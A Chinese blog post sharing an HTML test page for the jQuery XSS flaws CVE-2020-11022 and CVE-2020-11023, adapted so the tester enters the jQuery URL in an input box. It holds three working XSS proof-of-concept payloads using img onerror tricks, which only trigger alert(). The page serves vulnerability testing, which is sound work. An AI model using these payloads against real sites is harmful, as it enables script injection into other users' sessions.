API接口测试之jQuery XSS测试HTMl模板

网上流传的对jQuery XSS测试的模板都是需要对源码的 src api 进行修改，对大量测试来说还是比较麻烦；

因此，这边直接加入了一个输入框进行输入相应的 api 接口，实现无需打开 html 源码修改，更加简便；

<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <title>jQuery XSS测试</title>
    <!-- 通过用户输入控制jQuery地址 -->
    <script src="about:blank" id="jqScript"></script>
</head>
<body>
<!-- URL输入区域 -->
<div style="margin: 10px;">
    <input type="text" id="apiUrl" 
           placeholder="输入jQuery API地址"
           style="width: 400px; padding: 5px;">
</div>

<script>
// 动态替换jQuery引用
document.getElementById('apiUrl').onchange = function() {
    document.getElementById('jqScript').src = this.value;
};
</script>

<!-- 原始测试代码保持不变 -->
<script>
function test(n,jq){
    sanitizedHTML = document.getElementById('poc'+n).innerHTML;
    if(jq){
        $('#div').html(sanitizedHTML);
    }else{
        div.innerHTML=sanitizedHTML;
    }
}
</script>
<h1>jQuery XSS Examples (CVE-2020-11022/CVE-2020-11023)</h1>
<p>PoCs of XSS bugs fixed in <a href="//blog.jquery.com/2020/04/10/jquery-3-5-0-released/">jQuery 3.5.0</a>. You can find the details in my blog post: <a href="//mksben.l0.cm/2020/05/jquery3.5.0-xss.html">English</a> / <a href="//masatokinugawa.l0.cm/2020/05/jquery3.5.0-xss.html">日本語</a></p>
 
<h2>PoC 1</h2>
<button onclick="test(1)">Assign to innerHTML</button> <button onclick="test(1,true)">Append via .html()</button>
<xmp id="poc1">
<style><style /><img src=x onerror=alert(2)> 
</xmp>
 
<h2>PoC 2 (Only jQuery 3.x affected)</h2>
<button onclick="test(2)">Assign to innerHTML</button> <button onclick="test(2,true)">Append via .html()</button>
<xmp id="poc2">
<img alt="<x" title="/><img src=x onerror=alert("1st")>">
</xmp>
 
<h2>PoC 3</h2>
<button onclick="test(3)">Assign to innerHTML</button> <button onclick="test(3,true)">Append via .html()</button>
<xmp id="poc3">
<option><style></option></select><img src=x onerror=alert("1st")></style>
</xmp>
 
<div id="div"></div>
</body>
</html>